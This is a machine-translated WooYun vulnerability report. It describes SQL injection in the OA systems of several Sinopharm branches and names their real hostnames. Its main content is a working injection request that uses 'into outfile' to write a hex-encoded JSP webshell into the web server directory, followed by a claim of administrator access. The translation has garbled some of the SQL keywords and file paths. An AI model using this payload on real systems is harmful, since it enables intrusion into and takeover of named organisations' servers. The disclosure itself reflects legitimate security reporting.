漏洞标题 在Sinopharm Group + getshell的许多分支的oa系统中存在sql注入漏洞 相关制造商 Sinopharm.com 漏洞作者 Sky666 提交时间 2016-05-10 17: 55 公共时间 2016-06-25 08: 50 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 Asp + sqlserver注入,管理后台外部,Mysql 漏洞详细信息 http://a6.gykghn.com: 8080/yyoa/index.jsp湖南分公司 http://oa.sinopharm-fj.com: 8080/yyoa福建分公司 http://oa.gykgnmg.com/yyoa内蒙古分公司 以湖南分公司为例 首先读取数据库目录
然后尝试拼接网站目录
可以读取,然后直接将文件上传到shell http://a6.gykghn.com: 8080/yyoa/common/js/menu/test.jsp doType=101& S1=选择%20unhex%28%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27%29%20%20into%20outfile%20%27D:/UFseeyon/OA/Tomcat的/web应用/yyoa/sky123.jsp%27 通过本地结构上传成功上传
是管理员权限
漏洞证明:
修理计划: 继续解决它。 版权声明:请注明出处sky666 @乌云